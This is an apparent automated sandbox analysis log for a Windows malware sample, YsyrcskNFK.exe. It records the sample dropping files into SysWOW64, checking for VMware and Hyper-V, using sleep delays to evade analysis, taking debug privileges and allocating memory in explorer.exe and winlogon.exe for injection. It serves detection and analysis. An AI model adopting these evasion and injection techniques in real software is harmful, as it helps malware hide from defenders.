Source: C:\Windows\SysWOW64\anfidear.exeDropped PE file which has not been started: C:\Windows\SysWOW64\oucradeam.dllJump to dropped file
Source: C:\Windows\SysWOW64\anfidear.exe TID: 6224Thread sleep count: 2218 > 30Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exe TID: 6224Thread sleep time: -2218000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exe TID: 6476Thread sleep count: 122 > 30Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exe TID: 6476Thread sleep time: -73200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exe TID: 6224Thread sleep count: 7254 > 30Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exe TID: 6224Thread sleep time: -7254000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeThread delayed: delay time: 600000Jump to behavior
Source: explorer.exe, 00000005.00000003.3075795912.0000000008968000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000005.00000000.2326241159.0000000008830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4781575407.0000000008830000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrsp
Source: YsyrcskNFK.exe, 00000000.00000002.2318581361.000000000066E000.00000004.00000020.00020000.00000000.sdmp, anfidear.exe, 00000001.00000002.4775969138.000000000068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: explorer.exe, 00000005.00000000.2326241159.0000000008A3E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000[
Source: explorer.exe, 00000005.00000000.2326241159.0000000008849000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: explorer.exe, 00000005.00000003.3075795912.0000000008968000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}}us
Source: explorer.exe, 00000005.00000002.4781575407.0000000008849000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008849000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: explorer.exe, 00000005.00000002.4781575407.0000000008924000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000005.00000000.2326241159.00000000089A6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00k
Source: explorer.exe, 00000005.00000000.2322542173.0000000000843000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000005.00000003.3075795912.0000000008968000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000003.3076305193.0000000002FD6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\anfidear.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHan0_2_00403A19
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHan0_2_00403A19
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_00403A19 mov eax, dword ptr fs:[00000030h]0_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: 1_2_00403A19 mov eax, dword ptr fs:[00000030h]1_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: 2_2_00403A19 mov eax, dword ptr fs:[00000030h]2_2_00403A19
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHan0_2_00403A19
Source: C:\Users\user\Desktop\YsyrcskNFK.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1F520000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 2A40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 2A50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 2CB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 2CC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 85B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 76F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 85C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 85E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 85F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: CD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: ADE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: A770000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 81C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 81D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 81F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 8200000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 8210000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 84C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 84D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 84E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 84F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 8500000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: CC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 8510000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 8520000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 8530000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 85D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: A8C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9450000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9460000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9470000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 2960000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 2970000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 29A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 2980000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 2990000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 29B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 29C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 29D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 7F00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 7F20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 7F30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 7F40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 7F50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 7F60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 7F70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 90C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 90D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9130000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 90E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 90F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9100000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9110000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9120000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9350000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9360000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9370000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9380000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9390000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9270000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 93C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 94A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9480000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 9490000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 94B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 94C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: A8D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: A8E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: A8F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: A900000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: A910000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: A920000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: A930000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: ADD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AF00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B1B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B1C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B1D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: B3F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DED0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: DEE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 2590000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: A9D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: CE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 2550000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 2560000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: 2580000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: A9E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: A9F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AA00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AA10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AA20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AA30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AA40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AA50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AA60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AA70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AA80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AA90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AAA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AAB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AAC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AAD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AAE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory allocated: C:\Windows\explorer.exe base: AAF0000 protect: page read and writeJump to behavior
